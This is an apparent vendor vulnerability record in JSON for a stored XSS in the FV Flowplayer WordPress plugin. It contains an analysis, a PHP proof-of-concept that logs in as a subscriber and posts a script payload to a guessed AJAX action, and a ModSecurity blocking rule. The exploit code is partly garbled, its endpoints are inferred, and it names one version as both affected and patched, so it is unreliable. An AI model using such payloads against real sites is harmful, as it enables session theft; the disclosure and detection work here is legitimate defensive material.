```json
{
"analysis": "Atomic Edge analysis of CVE-2026-49773 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) in the FV Flowplayer Video Player plugin for WordPress, affecting versions up to and including 7.5.51.7212. Authenticated attackers with subscriber-level access or higher can inject arbitrary web scripts that execute when any user views the compromised page. The CVSS score of 6.4 reflects a moderate severity due to the requirement for authentication, but the impact is broadened by the scope change to other users.
Root Cause: Based on the CWE-79 classification and the description, the vulnerability stems from insufficient input sanitization and output escaping. The FV Flowplayer Video Player plugin likely processes user-supplied data (e.g., video URLs, shortcode attributes, metadata) that is stored in the database and later rendered on a page. Without proper sanitization (wp_kses, sanitize_text_field) and escaping (esc_html, esc_attr), an attacker can inject HTML and JavaScript. This is a common pattern in WordPress plugins where shortcode attributes or settings are neither sanitized before saving nor escaped when output. Without a code diff this remains an inference, but it is consistent with the CWE classification and the descriptive metadata.
Exploitation: The attacker must have at least a subscriber-level account on the target WordPress site. The vector likely involves a WordPress AJAX action (e.g., admin-ajax.php) or a REST API endpoint that processes video player configuration. The attacker sends a crafted request with the action parameter corresponding to a FV Flowplayer settings update or shortcode save. The payload, such as 'alert(document.cookie)', is inserted into a text field or attribute (e.g., video title, URL, or a custom field). Once saved, this payload is stored and executed when an administrator or another user visits the page containing the player. The plugin slug fv-wordpress-flowplayer suggests endpoints like admin-ajax.php?action=fv_player_save_settings or a REST route like /wp-json/fv-flowplayer/v1/config.
Remediation: The fix requires implementing proper input validation and output escaping throughout the plugin. For all user-submitted data that gets stored, the plugin should use WordPress functions like sanitize_text_field(), sanitize_url(), or wp_kses() with an explicit allowed-HTML list (e.g., from wp_kses_allowed_html()), depending on the expected content. When rendering stored data in HTML attributes or tag bodies, the plugin must apply esc_attr() or esc_html() to neutralize any script injection. The patched version 7.5.51.7212 likely includes these sanitization and escaping corrections.
Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user visiting the infected page. This leads to session hijacking, credential theft via phishing overlays, forced actions on behalf of administrators (e.g., creating new admin accounts), and defacement. Since the XSS is stored, the attack persists until the infected content is removed or patched.",
"poc_php": "<?php\n// Atomic Edge CVE Research – Proof of Concept (metadata-based)\n// CVE-2026-49773 – FV Flowplayer Video Player $username,\n 'pwd' => $password,\n 'remember' => 'true',\n 'wp-submit' => 'Log In',\n 'redirect_to' => $target_url . '/wp-admin/',\n 'testcookie' => '1'\n);\n\ncurl_setopt($ch, CURLOPT_URL, $login_url);\ncurl_setopt($ch, CURLOPT_POST, true);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n$response = curl_exec($ch);\nif (strpos($response, 'Dashboard') === false) {\n die('Login failed. Check credentials.');\n}\necho \"[+] Logged in as subscriber.\\n\";\n\n// Step 2: Determine the AJAX action from the plugin (inferred: FV Flowplayer saves config via admin-ajax)\n// Common actions: fvp_save_settings, fv_player_save_video, fv_flowplayer_update\n$ajax_url = $target_url . '/wp-admin/admin-ajax.php';\n\n// XSS payload: injects a script into a video title or description field\n$payload = 'alert(\"XSS by Atomic Edge\");';\n\n// Assume the plugin uses action 'fv_player_save' with parameter 'video_title' (inferred)\n$exploit_data = array(\n 'action' => 'fv_player_save',\n 'video_id' => '1',\n 'video_title' => $payload,\n 'video_url' => 'https://example.com/video.mp4',\n '_wpnonce' => '' // Nonce may not be checked (common vulnerability)\n);\n\ncurl_setopt($ch, CURLOPT_URL, $ajax_url);\ncurl_setopt($ch, CURLOPT_POST, true);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n$response = curl_exec($ch);\n\nif (strpos($response, 'success') !== false) {\n echo \"[+] XSS payload submitted successfully. Visit any page with the injected video to trigger.\\n\";\n} else {\n echo \"[-] Exploit may have failed. Check response:\\n$response\\n\";\n}\n\ncurl_close($ch);\n?>\n",
"modsecurity_rule": "# Atomic Edge WAF Rule – CVE-2026-49773 (metadata-based)\n# Blocks stored XSS via FV Flowplayer AJAX save action\nSecRule REQUEST_URI \"@streq /wp-admin/admin-ajax.php\" \\\n \"id:20261974,phase:2,deny,status:403,chain,msg:'CVE-2026-49773 – FV Flowplayer Stored XSS via AJAX',severity:'CRITICAL',tag:'CVE-2026-49773'\"\n SecRule ARGS_POST:action \"@streq fv_player_save\" \"chain\"\n SecRule ARGS_POST:video_title \"@rx ]*>.*\"\n"
}
```